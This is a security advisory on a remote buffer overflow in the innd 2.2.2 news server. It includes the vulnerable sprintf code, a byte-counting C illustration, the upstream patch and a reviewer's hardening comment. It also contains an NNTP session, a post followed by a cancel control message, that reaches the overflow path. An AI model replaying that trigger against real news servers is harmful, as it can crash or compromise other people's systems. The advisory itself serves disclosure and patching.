innd 2.2.2 remote buffer overflow vulnerability

(2000-06-10 00:00) (京九) (source unknown)
Vulnerability description:

  innd 2.2.2, the latest release of a very widely deployed news server, contains a remote buffer overflow; earlier versions are affected as well. The problem is in the function ARTcancelverify in innd/art.c:

if (!EQ(local, p)) {
    files = NULL;
    /* buff is a fixed 256-byte array; MessageID is printed with an
     * unbounded %s, so an oversized Message-ID overruns buff. */
    (void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
                  p, MessageID, local);
    ARTlog(Data, ART_REJECT, buff);
}

  Here buff is 256 bytes long, but MessageID can exceed 1000 bytes. This code path is reached when a cancel request containing a valid Message-ID is posted to a particular newsgroup.
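
The following C program is an added illustration for this advisory; it is not code from INN or from the advisory's author. It reproduces the format string from ARTcancelverify and the patched counterpart and, with snprintf(NULL, 0, ...), counts how many bytes each would write for a constructed 1000-character Message-ID, so the overflow is shown as a length computation instead of an actual memory overwrite. It also shows the hardened form a maintainer would write today: snprintf bounded by sizeof buff, returning whether the text fit. The function names (reject_msg_len_original, build_reject_msg, make_long_msgid and so on), the sample address and the sample Message-ID are assumptions of this example; the 256-byte buffer and the %.50s / %.70s precision caps come from the advisory and its patch.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of buff in ARTcancelverify as given in the advisory. */
#define BUFF_SIZE 256

/* Characters sprintf() would emit for the original (unbounded %s) format.
 * snprintf(NULL, 0, ...) only counts; it writes nothing. */
size_t reject_msg_len_original(const char *p, const char *msgid, const char *local)
{
    int n = snprintf(NULL, 0, "\"%.50s\" wants to cancel %s by \"%.50s\"", p, msgid, local);
    return n < 0 ? 0 : (size_t)n;
}

/* Same count for the patched format (MessageID capped at 70 characters). */
size_t reject_msg_len_patched(const char *p, const char *msgid, const char *local)
{
    int n = snprintf(NULL, 0, "\"%.50s\" wants to cancel %.70s by \"%.50s\"", p, msgid, local);
    return n < 0 ? 0 : (size_t)n;
}

/* Would the original sprintf() write past a BUFF_SIZE-byte buffer?
 * The +1 accounts for the terminating NUL. */
bool original_overflows(const char *p, const char *msgid, const char *local)
{
    return reject_msg_len_original(p, msgid, local) + 1 > BUFF_SIZE;
}

/* Hardened log-line build (assumed here, not INN's own code): bounded by the
 * precision caps and by the destination size. Returns true if the text fit
 * without truncation, so a caller can decide how to log an oversized request. */
bool build_reject_msg(char *buff, size_t size, const char *p, const char *msgid, const char *local)
{
    int n = snprintf(buff, size, "\"%.50s\" wants to cancel %.70s by \"%.50s\"", p, msgid, local);
    return n >= 0 && (size_t)n < size;
}

/* Format into a BUFF_SIZE stack buffer and report whether it fit. */
bool hardened_path_fits(const char *p, const char *msgid, const char *local)
{
    char buff[BUFF_SIZE];
    return build_reject_msg(buff, sizeof buff, p, msgid, local);
}

/* Constructed sample Message-ID of exactly len characters: "<AAA...A>".
 * Caller frees. Returns NULL for len < 2 or allocation failure. */
char *make_long_msgid(size_t len)
{
    char *s = len < 2 ? NULL : malloc(len + 1);
    if (s == NULL)
        return NULL;
    memset(s, 'A', len);
    s[0] = '<';
    s[len - 1] = '>';
    s[len] = '\0';
    return s;
}

int main(void)
{
    const char *poster = "poster@example.invalid";   /* constructed sample address */
    char *msgid = make_long_msgid(1000);             /* the >1000-byte case from the advisory */
    char buff[BUFF_SIZE];

    if (msgid == NULL)
        return 1;
    printf("original format needs %zu bytes, buffer is %d: %s\n",
           reject_msg_len_original(poster, msgid, poster) + 1, BUFF_SIZE,
           original_overflows(poster, msgid, poster) ? "would overflow" : "fits");
    printf("patched format needs %zu bytes\n", reject_msg_len_patched(poster, msgid, poster) + 1);
    if (build_reject_msg(buff, sizeof buff, poster, msgid, poster))
        printf("hardened log line: %s\n", buff);
    free(msgid);
    return 0;
}
```

With the patched format the worst case is 50 + 70 + 50 characters plus the 25 fixed characters of the template, 195 bytes plus the terminator, which is why the %.70s cap alone is enough for a 256-byte buff. The snprintf variant does not depend on that arithmetic: if a later change widened a precision or shrank the buffer, the call would truncate and report it instead of writing past the end.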


The test session is as follows:

201 XXX InterNetNews NNRP server INN 2.2 23-Oct-1998 ready (posting ok)
mode reader
group pl.test
post
Message-ID: <none@LONGBUFFER>
From: <test@polbox.com>
Sender: <test@polbox.com>
Newsgroups: pl.test

testing
. <- single dot, comment to avoid mail transfer problems
group control
post
Message-ID: <some-random-msgid@test.pl>
Approved: <approver@approving.net>
From: <sucker@free.net.pl>
Sender: <sucker@free.net.pl>
Control: cancel <none@LONGBUFFER>
Subject: cmsg cancel <none@LONGBUFFER>
Newsgroups: control

Damn, cancel it.
. <- single dot
quit


  Note: this code is only executed when verifycancels in inn.conf is enabled. By default, verifycancels is disabled.

Solution:

The patch is as follows:
--- inn/innd/art.c 2000/06/05 22:39:52 1.142
+++ inn/innd/art.c 2000/06/06 19:31:56 1.143
@@ -1042,7 +1042,7 @@
HeaderCleanFrom(p);
if (!EQ(q, p)) {
token = NULL;
- (void)sprintf(buff, "\"%.50s\" wants to cancel %s by \"%.50s\"",
+ (void)sprintf(buff, "\"%.50s\" wants to cancel %.70s by \"%.50s\"",
p, MessageID, q);
ARTlog(Data, ART_REJECT, buff);
}
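Review bot: the %.70s precision on the MessageID argument makes the worst case 50 + 70 + 50 characters plus the 25 fixed characters of the template, 195 bytes plus the terminator, which fits the 256-byte buff described above, but that bound is implicit; consider `(void)snprintf(buff, sizeof buff, ...)` so the limit follows the buffer declaration rather than a sum that must be rechecked whenever a precision or the buffer size changes. Also, the context lines here (`token = NULL;`, `q`) differ from the snippet quoted in the description (`files = NULL;`, `local`), and the header gives art.c revisions 1.142 and 1.143, so this hunk appears to be against a later revision of art.c than the 2.2.2 release; applying it to 2.2.2 sources may need manual adjustment.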